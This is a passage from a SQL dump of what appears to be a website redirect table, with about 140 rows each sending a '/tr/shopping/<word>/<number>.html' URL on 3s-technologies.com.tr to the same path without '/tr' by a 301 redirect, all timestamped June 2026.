00:00:00',301),(75827,'https://3s-technologies.com.tr/tr/shopping/tincturing/4283737953.html',NULL,'https://3s-technologies.com.tr/shopping/tincturing/4283737953.html','',1,0,'2026-06-11 08:02:51','0000-00-00 00:00:00',301),(75828,'https://3s-technologies.com.tr/tr/shopping/hersal/597098951.html',NULL,'https://3s-technologies.com.tr/shopping/hersal/597098951.html','',1,0,'2026-06-11 08:02:53','0000-00-00 00:00:00',301),(75829,'https://3s-technologies.com.tr/tr/shopping/foreignism/1022844372.html',NULL,'https://3s-technologies.com.tr/shopping/foreignism/1022844372.html','',1,0,'2026-06-11 08:02:56','0000-00-00 00:00:00',301),(75830,'https://3s-technologies.com.tr/tr/shopping/whelk/3266535698.html',NULL,'https://3s-technologies.com.tr/shopping/whelk/3266535698.html','',1,0,'2026-06-11 08:02:59','0000-00-00 00:00:00',301),(75831,'https://3s-technologies.com.tr/tr/shopping/cosmoramic/3370682783.html',NULL,'https://3s-technologies.com.tr/shopping/cosmoramic/3370682783.html','',1,0,'2026-06-11 08:03:07','0000-00-00 00:00:00',301),(75832,'https://3s-technologies.com.tr/tr/shopping/dramatis/3364718357.html',NULL,'https://3s-technologies.com.tr/shopping/dramatis/3364718357.html','',1,0,'2026-06-11 08:03:12','0000-00-00 00:00:00',301),(75833,'https://3s-technologies.com.tr/tr/shopping/broadbean/650229450.html',NULL,'https://3s-technologies.com.tr/shopping/broadbean/650229450.html','',1,0,'2026-06-11 08:03:15','0000-00-00 00:00:00',301),(75834,'https://3s-technologies.com.tr/tr/shopping/proffer/3144730368.html',NULL,'https://3s-technologies.com.tr/shopping/proffer/3144730368.html','',1,0,'2026-06-11 08:03:18','0000-00-00 00:00:00',301),(75835,'https://3s-technologies.com.tr/tr/shopping/feejeean/2155011035.html',NULL,'https://3s-technologies.com.tr/shopping/feejeean/2155011035.html','',1,0,'2026-06-11 08:03:21','0000-00-00 00:00:00',301),(75836,'https://3s-technologies.com.tr/tr/shopping/tackle/213770565.html',NULL,'https://3s-technologies.com.tr/shopping/tackle/213770565.html','',1,0,'2026-06-11 08:03:24','0000-00-00 00:00:00',301),(75837,'https://3s-technologies.com.tr/tr/shopping/broiling/3748836785.html',NULL,'https://3s-technologies.com.tr/shopping/broiling/3748836785.html','',1,0,'2026-06-11 08:03:27','0000-00-00 00:00:00',301),(75838,'https://3s-technologies.com.tr/tr/shopping/dethroned/444895181.html',NULL,'https://3s-technologies.com.tr/shopping/dethroned/444895181.html','',1,0,'2026-06-11 08:03:30','0000-00-00 00:00:00',301),(75839,'https://3s-technologies.com.tr/tr/shopping/interarboration/1884075402.html',NULL,'https://3s-technologies.com.tr/shopping/interarboration/1884075402.html','',1,0,'2026-06-11 08:03:33','0000-00-00 00:00:00',301),(75840,'https://3s-technologies.com.tr/tr/shopping/springbock/3825197757.html',NULL,'https://3s-technologies.com.tr/shopping/springbock/3825197757.html','',1,0,'2026-06-11 08:03:36','0000-00-00 00:00:00',301),(75841,'https://3s-technologies.com.tr/tr/shopping/touter/1020256667.html',NULL,'https://3s-technologies.com.tr/shopping/touter/1020256667.html','',1,0,'2026-06-11 08:03:39','0000-00-00 00:00:00',301),(75842,'https://3s-technologies.com.tr/tr/shopping/emulsive/2561469308.html',NULL,'https://3s-technologies.com.tr/shopping/emulsive/2561469308.html','',1,0,'2026-06-11 08:03:42','0000-00-00 00:00:00',301),(75843,'https://3s-technologies.com.tr/tr/shopping/solvend/1388982011.html',NULL,'https://3s-technologies.com.tr/shopping/solvend/1388982011.html','',1,0,'2026-06-11 08:03:45','0000-00-00 00:00:00',301),(75844,'https://3s-technologies.com.tr/tr/shopping/cernuous/2277511073.html',NULL,'https://3s-technologies.com.tr/shopping/cernuous/2277511073.html','',1,0,'2026-06-11 08:03:48','0000-00-00 00:00:00',301),(75845,'https://3s-technologies.com.tr/tr/shopping/pacesetter/3287872375.html',NULL,'https://3s-technologies.com.tr/shopping/pacesetter/3287872375.html','',1,0,'2026-06-11 08:03:51','0000-00-00 00:00:00',301),(75846,'https://3s-technologies.com.tr/tr/shopping/widowed/625793972.html',NULL,'https://3s-technologies.com.tr/shopping/widowed/625793972.html','',1,0,'2026-06-11 08:03:54','0000-00-00 00:00:00',301),(75847,'https://3s-technologies.com.tr/tr/shopping/nutalli/1471837795.html',NULL,'https://3s-technologies.com.tr/shopping/nutalli/1471837795.html','',1,0,'2026-06-11 08:04:01','0000-00-00 00:00:00',301),(75848,'https://3s-technologies.com.tr/tr/shopping/ouarine/866519295.html',NULL,'https://3s-technologies.com.tr/shopping/ouarine/866519295.html','',1,0,'2026-06-11 08:04:05','0000-00-00 00:00:00',301),(75849,'https://3s-technologies.com.tr/tr/shopping/deucedly/4213859549.html',NULL,'https://3s-technologies.com.tr/shopping/deucedly/4213859549.html','',1,0,'2026-06-11 08:04:08','0000-00-00 00:00:00',301),(75850,'https://3s-technologies.com.tr/tr/shopping/serving/2337821151.html',NULL,'https://3s-technologies.com.tr/shopping/serving/2337821151.html','',1,0,'2026-06-11 08:04:11','0000-00-00 00:00:00',301),(75851,'https://3s-technologies.com.tr/tr/shopping/underkeeper/3175589979.html',NULL,'https://3s-technologies.com.tr/shopping/underkeeper/3175589979.html','',1,0,'2026-06-11 08:04:14','0000-00-00 00:00:00',301),(75852,'https://3s-technologies.com.tr/tr/shopping/phasianella/1581738176.html',NULL,'https://3s-technologies.com.tr/shopping/phasianella/1581738176.html','',1,0,'2026-06-11 08:04:17','0000-00-00 00:00:00',301),(75853,'https://3s-technologies.com.tr/tr/shopping/errant/2006738963.html',NULL,'https://3s-technologies.com.tr/shopping/errant/2006738963.html','',1,0,'2026-06-11 08:04:20','0000-00-00 00:00:00',301),(75854,'https://3s-technologies.com.tr/tr/shopping/skyscraper/206757595.html',NULL,'https://3s-technologies.com.tr/shopping/skyscraper/206757595.html','',1,0,'2026-06-11 08:04:23','0000-00-00 00:00:00',301),(75855,'https://3s-technologies.com.tr/tr/shopping/audenesque/3972085666.html',NULL,'https://3s-technologies.com.tr/shopping/audenesque/3972085666.html','',1,0,'2026-06-11 08:04:26','0000-00-00 00:00:00',301),(75856,'https://3s-technologies.com.tr/tr/shopping/drawing/3309554410.html',NULL,'https://3s-technologies.com.tr/shopping/drawing/3309554410.html','',1,0,'2026-06-11 08:04:29','0000-00-00 00:00:00',301),(75857,'https://3s-technologies.com.tr/tr/shopping/fever/1209548568.html',NULL,'https://3s-technologies.com.tr/shopping/fever/1209548568.html','',1,0,'2026-06-11 08:04:32','0000-00-00 00:00:00',301),(75858,'https://3s-technologies.com.tr/tr/shopping/riddle/2159599823.html',NULL,'https://3s-technologies.com.tr/shopping/riddle/2159599823.html','',1,0,'2026-06-11 08:04:35','0000-00-00 00:00:00',301),(75859,'https://3s-technologies.com.tr/tr/shopping/leanest/2682920770.html',NULL,'https://3s-technologies.com.tr/shopping/leanest/2682920770.html','',1,0,'2026-06-11 08:04:38','0000-00-00 00:00:00',301),(75860,'https://3s-technologies.com.tr/tr/shopping/soapsuds/2913346160.html',NULL,'https://3s-technologies.com.tr/shopping/soapsuds/2913346160.html','',1,0,'2026-06-11 08:04:41','0000-00-00 00:00:00',301),(75861,'https://3s-technologies.com.tr/tr/shopping/cyclothymic/2390951650.html',NULL,'https://3s-technologies.com.tr/shopping/cyclothymic/2390951650.html','',1,0,'2026-06-11 08:04:44','0000-00-00 00:00:00',301),(75862,'https://3s-technologies.com.tr/tr/shopping/ferde/3104499460.html',NULL,'https://3s-technologies.com.tr/shopping/ferde/3104499460.html','',1,0,'2026-06-11 08:04:47','0000-00-00 00:00:00',301),(75863,'https://3s-technologies.com.tr/tr/shopping/fiberless/3435808876.html',NULL,'https://3s-technologies.com.tr/shopping/fiberless/3435808876.html','',1,0,'2026-06-11 08:04:50','0000-00-00 00:00:00',301),(75864,'https://3s-technologies.com.tr/tr/shopping/demon/920861877.html',NULL,'https://3s-technologies.com.tr/shopping/demon/920861877.html','',1,0,'2026-06-11 08:04:53','0000-00-00 00:00:00',301),(75865,'https://3s-technologies.com.tr/tr/shopping/peppermint/1721946368.html',NULL,'https://3s-technologies.com.tr/shopping/peppermint/1721946368.html','',1,0,'2026-06-11 08:04:56','0000-00-00 00:00:00',301),(75866,'https://3s-technologies.com.tr/tr/shopping/hellhag/3682335070.html',NULL,'https://3s-technologies.com.tr/shopping/hellhag/3682335070.html','',1,0,'2026-06-11 08:04:59','0000-00-00 00:00:00',301),(75867,'https://3s-technologies.com.tr/tr/shopping/predesignate/1546519187.html',NULL,'https://3s-technologies.com.tr/shopping/predesignate/1546519187.html','',1,0,'2026-06-11 08:05:02','0000-00-00 00:00:00',301),(75868,'https://3s-technologies.com.tr/tr/shopping/apertly/2107509375.html',NULL,'https://3s-technologies.com.tr/shopping/apertly/2107509375.html','',1,0,'2026-06-11 08:05:09','0000-00-00 00:00:00',301),(75869,'https://3s-technologies.com.tr/tr/shopping/fustilug/861766968.html',NULL,'https://3s-technologies.com.tr/shopping/fustilug/861766968.html','',1,0,'2026-06-11 08:05:12','0000-00-00 00:00:00',301),(75870,'https://3s-technologies.com.tr/tr/shopping/lacertid/41909682.html',NULL,'https://3s-technologies.com.tr/shopping/lacertid/41909682.html','',1,0,'2026-06-11 08:05:15','0000-00-00 00:00:00',301),(75871,'https://3s-technologies.com.tr/tr/shopping/preemptioner/879842033.html',NULL,'https://3s-technologies.com.tr/shopping/preemptioner/879842033.html','',1,0,'2026-06-11 08:05:18','0000-00-00 00:00:00',301),(75872,'https://3s-technologies.com.tr/tr/shopping/saltpeter/4099552199.html',NULL,'https://3s-technologies.com.tr/shopping/saltpeter/4099552199.html','',1,0,'2026-06-11 08:05:21','0000-00-00 00:00:00',301),(75873,'https://3s-technologies.com.tr/tr/shopping/labourer/140255864.html',NULL,'https://3s-technologies.com.tr/shopping/labourer/140255864.html','',1,0,'2026-06-11 08:05:24','0000-00-00 00:00:00',301),(75874,'https://3s-technologies.com.tr/tr/shopping/phallic/3200121526.html',NULL,'https://3s-technologies.com.tr/shopping/phallic/3200121526.html','',1,0,'2026-06-11 08:05:27','0000-00-00 00:00:00',301),(75875,'https://3s-technologies.com.tr/tr/shopping/friezed/4190540069.html',NULL,'https://3s-technologies.com.tr/shopping/friezed/4190540069.html','',1,0,'2026-06-11 08:05:30','0000-00-00 00:00:00',301),(75876,'https://3s-technologies.com.tr/tr/shopping/savable/478342513.html',NULL,'https://3s-technologies.com.tr/shopping/savable/478342513.html','',1,0,'2026-06-11 08:05:35','0000-00-00 00:00:00',301),(75877,'https://3s-technologies.com.tr/tr/shopping/plesiosaur/4171627574.html',NULL,'https://3s-technologies.com.tr/shopping/plesiosaur/4171627574.html','',1,0,'2026-06-11 08:05:39','0000-00-00 00:00:00',301),(75878,'https://3s-technologies.com.tr/tr/shopping/taintless/671780343.html',NULL,'https://3s-technologies.com.tr/shopping/taintless/671780343.html','',1,0,'2026-06-11 08:05:42','0000-00-00 00:00:00',301),(75879,'https://3s-technologies.com.tr/tr/shopping/middleground/1762409756.html',NULL,'https://3s-technologies.com.tr/shopping/middleground/1762409756.html','',1,0,'2026-06-11 08:05:45','0000-00-00 00:00:00',301),(75880,'https://3s-technologies.com.tr/tr/shopping/mnemonical/2005526880.html',NULL,'https://3s-technologies.com.tr/shopping/mnemonical/2005526880.html','',1,0,'2026-06-11 08:05:48','0000-00-00 00:00:00',301),(75881,'https://3s-technologies.com.tr/tr/shopping/lustrical/92104903.html',NULL,'https://3s-technologies.com.tr/shopping/lustrical/92104903.html','',1,0,'2026-06-11 08:05:51','0000-00-00 00:00:00',301),(75882,'https://3s-technologies.com.tr/tr/shopping/illation/2514270822.html',NULL,'https://3s-technologies.com.tr/shopping/illation/2514270822.html','',1,0,'2026-06-11 08:05:58','0000-00-00 00:00:00',301),(75883,'https://3s-technologies.com.tr/tr/shopping/chafferer/2996812163.html',NULL,'https://3s-technologies.com.tr/shopping/chafferer/2996812163.html','',1,0,'2026-06-11 08:06:01','0000-00-00 00:00:00',301),(75884,'https://3s-technologies.com.tr/tr/shopping/enfranchiser/4216024139.html',NULL,'https://3s-technologies.com.tr/shopping/enfranchiser/4216024139.html','',1,0,'2026-06-11 08:06:04','0000-00-00 00:00:00',301),(75885,'https://3s-technologies.com.tr/tr/shopping/agitatedly/3525402828.html',NULL,'https://3s-technologies.com.tr/shopping/agitatedly/3525402828.html','',1,0,'2026-06-11 08:06:07','0000-00-00 00:00:00',301),(75886,'https://3s-technologies.com.tr/tr/shopping/disporting/2601277069.html',NULL,'https://3s-technologies.com.tr/shopping/disporting/2601277069.html','',1,0,'2026-06-11 08:06:10','0000-00-00 00:00:00',301),(75887,'https://3s-technologies.com.tr/tr/shopping/striges/2072849928.html',NULL,'https://3s-technologies.com.tr/shopping/striges/2072849928.html','',1,0,'2026-06-11 08:06:13','0000-00-00 00:00:00',301),(75888,'https://3s-technologies.com.tr/tr/shopping/arnaut/637559269.html',NULL,'https://3s-technologies.com.tr/shopping/arnaut/637559269.html','',1,0,'2026-06-11 08:06:16','0000-00-00 00:00:00',301),(75889,'https://3s-technologies.com.tr/tr/shopping/glozing/2620400678.html',NULL,'https://3s-technologies.com.tr/shopping/glozing/2620400678.html','',1,0,'2026-06-11 08:06:19','0000-00-00 00:00:00',301),(75890,'https://3s-technologies.com.tr/tr/shopping/byssi/2437379432.html',NULL,'https://3s-technologies.com.tr/shopping/byssi/2437379432.html','',1,0,'2026-06-11 08:06:22','0000-00-00 00:00:00',301),(75891,'https://3s-technologies.com.tr/tr/shopping/sprucely/2317696557.html',NULL,'https://3s-technologies.com.tr/shopping/sprucely/2317696557.html','',1,0,'2026-06-11 08:06:25','0000-00-00 00:00:00',301),(75892,'https://3s-technologies.com.tr/tr/shopping/dimmer/2927324525.html',NULL,'https://3s-technologies.com.tr/shopping/dimmer/2927324525.html','',1,0,'2026-06-11 08:06:28','0000-00-00 00:00:00',301),(75893,'https://3s-technologies.com.tr/tr/shopping/strond/2908593833.html',NULL,'https://3s-technologies.com.tr/shopping/strond/2908593833.html','',1,0,'2026-06-11 08:06:31','0000-00-00 00:00:00',301),(75894,'https://3s-technologies.com.tr/tr/shopping/scombriformes/50432486.html',NULL,'https://3s-technologies.com.tr/shopping/scombriformes/50432486.html','',1,0,'2026-06-11 08:06:35','0000-00-00 00:00:00',301),(75895,'https://3s-technologies.com.tr/tr/shopping/crase/1869701018.html',NULL,'https://3s-technologies.com.tr/shopping/crase/1869701018.html','',1,0,'2026-06-11 08:06:38','0000-00-00 00:00:00',301),(75896,'https://3s-technologies.com.tr/tr/shopping/roboration/2271710170.html',NULL,'https://3s-technologies.com.tr/shopping/roboration/2271710170.html','',1,0,'2026-06-11 08:06:41','0000-00-00 00:00:00',301),(75897,'https://3s-technologies.com.tr/tr/shopping/plumpest/133124779.html',NULL,'https://3s-technologies.com.tr/shopping/plumpest/133124779.html','',1,0,'2026-06-11 08:06:44','0000-00-00 00:00:00',301),(75898,'https://3s-technologies.com.tr/tr/shopping/retecious/356676835.html',NULL,'https://3s-technologies.com.tr/shopping/retecious/356676835.html','',1,0,'2026-06-11 08:06:46','0000-00-00 00:00:00',301),(75899,'https://3s-technologies.com.tr/tr/shopping/nightlong/2113473769.html',NULL,'https://3s-technologies.com.tr/shopping/nightlong/2113473769.html','',1,0,'2026-06-11 08:06:50','0000-00-00 00:00:00',301),(75900,'https://3s-technologies.com.tr/tr/shopping/axile/3606883006.html',NULL,'https://3s-technologies.com.tr/shopping/axile/3606883006.html','',1,0,'2026-06-11 08:06:53','0000-00-00 00:00:00',301),(75901,'https://3s-technologies.com.tr/tr/shopping/constituent/1286439958.html',NULL,'https://3s-technologies.com.tr/shopping/constituent/1286439958.html','',1,0,'2026-06-11 08:06:56','0000-00-00 00:00:00',301),(75902,'https://3s-technologies.com.tr/tr/shopping/violette/2560257193.html',NULL,'https://3s-technologies.com.tr/shopping/violette/2560257193.html','',1,0,'2026-06-11 08:06:59','0000-00-00 00:00:00',301),(75903,'https://3s-technologies.com.tr/tr/shopping/monospermal/282046120.html',NULL,'https://3s-technologies.com.tr/shopping/monospermal/282046120.html','',1,0,'2026-06-11 08:07:02','0000-00-00 00:00:00',301),(75904,'https://3s-technologies.com.tr/tr/shopping/scious/1182292873.html',NULL,'https://3s-technologies.com.tr/shopping/scious/1182292873.html','',1,0,'2026-06-11 08:07:04','0000-00-00 00:00:00',301),(75905,'https://3s-technologies.com.tr/tr/shopping/medieval/3822773543.html',NULL,'https://3s-technologies.com.tr/shopping/medieval/3822773543.html','',1,0,'2026-06-11 08:07:08','0000-00-00 00:00:00',301),(75906,'https://3s-technologies.com.tr/tr/shopping/throwe/943624869.html',NULL,'https://3s-technologies.com.tr/shopping/throwe/943624869.html','',1,0,'2026-06-11 08:07:11','0000-00-00 00:00:00',301),(75907,'https://3s-technologies.com.tr/tr/shopping/hypocritic/2811200142.html',NULL,'https://3s-technologies.com.tr/shopping/hypocritic/2811200142.html','',1,0,'2026-06-11 08:07:13','0000-00-00 00:00:00',301),(75908,'https://3s-technologies.com.tr/tr/shopping/commercialisation/1068616559.html',NULL,'https://3s-technologies.com.tr/shopping/commercialisation/1068616559.html','',1,0,'2026-06-11 08:07:16','0000-00-00 00:00:00',301),(75909,'https://3s-technologies.com.tr/tr/shopping/furloughing/2930864737.html',NULL,'https://3s-technologies.com.tr/shopping/furloughing/2930864737.html','',1,0,'2026-06-11 08:07:22','0000-00-00 00:00:00',301),(75910,'https://3s-technologies.com.tr/tr/shopping/fother/2021046589.html',NULL,'https://3s-technologies.com.tr/shopping/fother/2021046589.html','',1,0,'2026-06-11 08:08:03','0000-00-00 00:00:00',301),(75911,'https://3s-technologies.com.tr/tr/shopping/bespurt/1647479160.html',NULL,'https://3s-technologies.com.tr/shopping/bespurt/1647479160.html','',1,0,'2026-06-11 08:08:06','0000-00-00 00:00:00',301),(75912,'https://3s-technologies.com.tr/tr/shopping/elinguation/3142142631.html',NULL,'https://3s-technologies.com.tr/shopping/elinguation/3142142631.html','',1,0,'2026-06-11 08:08:10','0000-00-00 00:00:00',301),(75913,'https://3s-technologies.com.tr/tr/shopping/fibrillae/2677119883.html',NULL,'https://3s-technologies.com.tr/shopping/fibrillae/2677119883.html','',1,0,'2026-06-11 08:08:15','0000-00-00 00:00:00',301),(75914,'https://3s-technologies.com.tr/tr/shopping/crimea/138091274.html',NULL,'https://3s-technologies.com.tr/shopping/crimea/138091274.html','',1,0,'2026-06-11 08:08:17','0000-00-00 00:00:00',301),(75915,'https://3s-technologies.com.tr/tr/shopping/strobilaceous/3699428317.html',NULL,'https://3s-technologies.com.tr/shopping/strobilaceous/3699428317.html','',1,0,'2026-06-11 08:08:20','0000-00-00 00:00:00',301),(75916,'https://3s-technologies.com.tr/tr/shopping/dismounting/1607827180.html',NULL,'https://3s-technologies.com.tr/shopping/dismounting/1607827180.html','',1,0,'2026-06-11 08:08:26','0000-00-00 00:00:00',301),(75917,'https://3s-technologies.com.tr/tr/shopping/debullition/3438396581.html',NULL,'https://3s-technologies.com.tr/shopping/debullition/3438396581.html','',1,0,'2026-06-11 08:08:33','0000-00-00 00:00:00',301),(75918,'https://3s-technologies.com.tr/tr/shopping/phenogamia/3478040819.html',NULL,'https://3s-technologies.com.tr/shopping/phenogamia/3478040819.html','',1,0,'2026-06-11 08:08:41','0000-00-00 00:00:00',301),(75919,'https://3s-technologies.com.tr/tr/shopping/coruscant/3284236094.html',NULL,'https://3s-technologies.com.tr/shopping/coruscant/3284236094.html','',1,0,'2026-06-11 08:08:46','0000-00-00 00:00:00',301),(75920,'https://3s-technologies.com.tr/tr/shopping/phenyl/2447932630.html',NULL,'https://3s-technologies.com.tr/shopping/phenyl/2447932630.html','',1,0,'2026-06-11 08:08:53','0000-00-00 00:00:00',301),(75921,'https://3s-technologies.com.tr/tr/shopping/scabra/1786845234.html',NULL,'https://3s-technologies.com.tr/shopping/scabra/1786845234.html','',1,0,'2026-06-11 08:09:01','0000-00-00 00:00:00',301),(75922,'https://3s-technologies.com.tr/tr/shopping/chuckle/1568971894.html',NULL,'https://3s-technologies.com.tr/shopping/chuckle/1568971894.html','',1,0,'2026-06-11 08:09:13','0000-00-00 00:00:00',301),(75923,'https://3s-technologies.com.tr/tr/shopping/cohune/3412914726.html',NULL,'https://3s-technologies.com.tr/shopping/cohune/3412914726.html','',1,0,'2026-06-11 08:09:20','0000-00-00 00:00:00',301),(75924,'https://3s-technologies.com.tr/tr/shopping/acupuncture/2081420355.html',NULL,'https://3s-technologies.com.tr/shopping/acupuncture/2081420355.html','',1,0,'2026-06-11 08:09:29','0000-00-00 00:00:00',301),(75925,'https://3s-technologies.com.tr/tr/shopping/glossiest/254953964.html',NULL,'https://3s-technologies.com.tr/shopping/glossiest/254953964.html','',1,0,'2026-06-11 08:09:41','0000-00-00 00:00:00',301),(75926,'https://3s-technologies.com.tr/tr/shopping/khenna/4263449836.html',NULL,'https://3s-technologies.com.tr/shopping/khenna/4263449836.html','',1,0,'2026-06-11 08:09:45','0000-00-00 00:00:00',301),(75927,'https://3s-technologies.com.tr/tr/shopping/doorcheek/101234872.html',NULL,'https://3s-technologies.com.tr/shopping/doorcheek/101234872.html','',1,0,'2026-06-11 08:09:53','0000-00-00 00:00:00',301),(75928,'https://3s-technologies.com.tr/tr/shopping/ascitic/3881868452.html',NULL,'https://3s-technologies.com.tr/shopping/ascitic/3881868452.html','',1,0,'2026-06-11 08:10:01','0000-00-00 00:00:00',301),(75929,'https://3s-technologies.com.tr/tr/shopping/anastate/690523202.html',NULL,'https://3s-technologies.com.tr/shopping/anastate/690523202.html','',1,0,'2026-06-11 08:10:09','0000-00-00 00:00:00',301),(75930,'https://3s-technologies.com.tr/tr/shopping/indentment/2194818796.html',NULL,'https://3s-technologies.com.tr/shopping/indentment/2194818796.html','',1,0,'2026-06-11 08:10:17','0000-00-00 00:00:00',301),(75931,'https://3s-technologies.com.tr/tr/shopping/hamite/2656831750.html',NULL,'https://3s-technologies.com.tr/shopping/hamite/2656831750.html','',1,0,'2026-06-11 08:10:24','0000-00-00 00:00:00',301),(75932,'https://3s-technologies.com.tr/tr/shopping/dandruff/1535524578.html',NULL,'https://3s-technologies.com.tr/shopping/dandruff/1535524578.html','',1,0,'2026-06-11 08:10:32','0000-00-00 00:00:00',301),(75933,'https://3s-technologies.com.tr/tr/shopping/overslow/588540691.html',NULL,'https://3s-technologies.com.tr/shopping/overslow/588540691.html','',1,0,'2026-06-11 08:10:40','0000-00-00 00:00:00',301),(75934,'https://3s-technologies.com.tr/tr/shopping/vespertilio/581563145.html',NULL,'https://3s-technologies.com.tr/shopping/vespertilio/581563145.html','',1,0,'2026-06-11 08:10:48','0000-00-00 00:00:00',301),(75935,'https://3s-technologies.com.tr/tr/shopping/sparry/188591031.html',NULL,'https://3s-technologies.com.tr/shopping/sparry/188591031.html','',1,0,'2026-06-11 08:10:56','0000-00-00 00:00:00',301),(75936,'https://3s-technologies.com.tr/tr/shopping/venary/896728736.html',NULL,'https://3s-technologies.com.tr/shopping/venary/896728736.html','',1,0,'2026-06-11 08:11:04','0000-00-00 00:00:00',301),(75937,'https://3s-technologies.com.tr/tr/shopping/docked/2959332515.html',NULL,'https://3s-technologies.com.tr/shopping/docked/2959332515.html','',1,0,'2026-06-11 08:11:11','0000-00-00 00:00:00',301),(75938,'https://3s-technologies.com.tr/tr/shopping/baldur/1620758282.html',NULL,'https://3s-technologies.com.tr/shopping/baldur/1620758282.html','',1,0,'2026-06-11 08:11:18','0000-00-00 00:00:00',301),(75939,'https://3s-technologies.com.tr/tr/shopping/appeacher/3321319723.html',NULL,'https://3s-technologies.com.tr/shopping/appeacher/3321319723.html','',1,0,'2026-06-11 08:11:27','0000-00-00 00:00:00',301),(75940,'https://3s-technologies.com.tr/tr/shopping/medallion/3405901756.html',NULL,'https://3s-technologies.com.tr/shopping/medallion/3405901756.html','',1,0,'2026-06-11 08:11:34','0000-00-00 00:00:00',301),(75941,'https://3s-technologies.com.tr/tr/shopping/blackout/2015082163.html',NULL,'https://3s-technologies.com.tr/shopping/blackout/2015082163.html','',1,0,'2026-06-11 08:11:41','0000-00-00 00:00:00',301),(75942,'https://3s-technologies.com.tr/tr/shopping/scrutinized/1776503166.html',NULL,'https://3s-technologies.com.tr/shopping/scrutinized/1776503166.html','',1,0,'2026-06-11 08:11:49','0000-00-00 00:00:00',301),(75943,'https://3s-technologies.com.tr/tr/shopping/bonitary/4287114642.html',NULL,'https://3s-technologies.com.tr/shopping/bonitary/4287114642.html','',1,0,'2026-06-11 08:11:57','0000-00-00 00:00:00',301),(75944,'https://3s-technologies.com.tr/tr/shopping/stentorian/3554868505.html',NULL,'https://3s-technologies.com.tr/shopping/stentorian/3554868505.html','',1,0,'2026-06-11 08:12:05','0000-00-00 00:00:00',301),(75945,'https://3s-technologies.com.tr/tr/shopping/townsmen/723353401.html',NULL,'https://3s-technologies.com.tr/shopping/townsmen/723353401.html','',1,0,'2026-06-11 08:12:13','0000-00-00 00:00:00',301),(75946,'https://3s-technologies.com.tr/tr/shopping/kinetophone/429964309.html',NULL,'https://3s-technologies.com.tr/shopping/kinetophone/429964309.html','',1,0,'2026-06-11 08:12:21','0000-00-00 00:00:00',301),(75947,'https://3s-technologies.com.tr/tr/shopping/dagswain/697869347.html',NULL,'https://3s-technologies.com.tr/shopping/dagswain/697869347.html','',1,0,'2026-06-11 08:12:29','0000-00-00 00:00:00',301),(75948,'https://3s-technologies.com.tr/tr/shopping/pestilentially/60822177.html',NULL,'https://3s-technologies.com.tr/shopping/pestilentially/60822177.html','',1,0,'2026-06-11 08:12:37','0000-00-00 00:00:00',301),(75949,'https://3s-technologies.com.tr/tr/shopping/colossal/2933658030.html',NULL,'https://3s-technologies.com.tr/shopping/colossal/2933658030.html','',1,0,'2026-06-11 08:12:44','0000-00-00 00:00:00',301),(75950,'https://3s-technologies.com.tr/tr/shopping/fringilla/3991396551.html',NULL,'https://3s-technologies.com.tr/shopping/fringilla/3991396551.html','',1,0,'2026-06-11 08:12:52','0000-00-00 00:00:00',301),(75951,'https://3s-technologies.com.tr/tr/shopping/absorptivity/2740901849.html',NULL,'https://3s-technologies.com.tr/shopping/absorptivity/2740901849.html','',1,0,'2026-06-11 08:13:00','0000-00-00 00:00:00',301),(75952,'https://3s-technologies.com.tr/tr/shopping/indetermination/3131987855.html',NULL,'https://3s-technologies.com.tr/shopping/indetermination/3131987855.html','',1,0,'2026-06-11 08:13:08','0000-00-00 00:00:00',301),(75953,'https://3s-technologies.com.tr/tr/shopping/boondoggle/3988019862.html',NULL,'https://3s-technologies.com.tr/shopping/boondoggle/3988019862.html','',1,0,'2026-06-11 08:13:16','0000-00-00 00:00:00',301),(75954,'https://3s-technologies.com.tr/tr/shopping/cacodemon/1519405376.html',NULL,'https://3s-technologies.com.tr/shopping/cacodemon/1519405376.html','',1,0,'2026-06-11 08:13:24','0000-00-00 00:00:00',301),(75955,'https://3s-technologies.com.tr/tr/shopping/indocibility/3012486783.html',NULL,'https://3s-technologies.com.tr/shopping/indocibility/3012486783.html','',1,0,'2026-06-11 08:13:32','0000-00-00 00:00:00',301),(75956,'https://3s-technologies.com.tr/tr/shopping/monish/532881774.html',NULL,'https://3s-technologies.com.tr/shopping/monish/532881774.html','',1,0,'2026-06-11 08:13:40','0000-00-00 00:00:00',301),(75957,'https://3s-technologies.com.tr/tr/shopping/fossilism/869476111.html',NULL,'https://3s-technologies.com.tr/shopping/fossilism/869476111.html','',1,0,'2026-06-11 08:13:51','0000-00-00 00:00:00',301),(75958,'https://3s-technologies.com.tr/tr/shopping/yardfuls/1259326131.html',NULL,'https://3s-technologies.com.tr/shopping/yardfuls/1259326131.html','',1,0,'2026-06-11 08:13:56','0000-00-00 00:00:00',301),(75959,'https://3s-technologies.com.tr/tr/shopping/bursting/2703258678.html',NULL,'https://3s-technologies.com.tr/shopping/bursting/2703258678.html','',1,0,'2026-06-11 08:14:04','0000-00-00 00:00:00',301),(75960,'https://3s-technologies.com.tr/tr/shopping/cullion/567001384.html',NULL,'https://3s-technologies.com.tr/shopping/cullion/567001384.html','',1,0,'2026-06-11 08:14:14','0000-00-00 00:00:00',301),(75961,'https://3s-technologies.com.tr/tr/shopping/chromatography/3166647270.html',NULL,'https://3s-technologies.com.tr/shopping/chromatography/3166647270.html','',1,0,'2026-06-11 08:14:21','0000-00-00 00:00:00',301),(75962,'https://3s-technologies.com.tr/tr/shopping/undersetter/4109685524.html',NULL,'https://3s-technologies.com.tr/shopping/undersetter/4109685524.html','',1,0,'2026-06-11 08:14:34','0000-00-00 00:00:00',301),(75963,'https://3s-technologies.com.tr/tr/shopping/postencephalon/303733628.html',NULL,'https://3s-technologies.com.tr/shopping/postencephalon/303733628.html','',1,0,'2026-06-11 08:14:40','0000-00-00 00:00:00',301),(75964,'https://3s-technologies.com.tr/tr/shopping/kelpfish/4275747735.html',NULL,'https://3s-technologies.com.tr/shopping/kelpfish/4275747735.html','',1,0,'2026-06-11 08:14:48','0000-00-00 00:00:00',301),(75965,'https://3s-technologies.com.tr/tr/shopping/sacer/2273454887.html',NULL,'https://3s-technologies.com.tr/shopping/sacer/2273454887.html','',1,0,'2026-06-11 08:14:56','0000-00-00 00:00:00',301),(75966,'https://3s-technologies.com.tr/tr/shopping/maned/2911550649.html',NULL,'https://3s-technologies.com.tr/shopping/maned/2911550649.html','',1,0,'2026-06-11 08:15:04','0000-00-00 00:00:00',301),(75967,'https://3s-technologies.com.tr/tr/shopping/steamboat/584519961.html',NULL,'https://3s-technologies.com.tr/shopping/steamboat/584519961.html','',1,0,'2026-06-11 08:15:12','0000-00-00 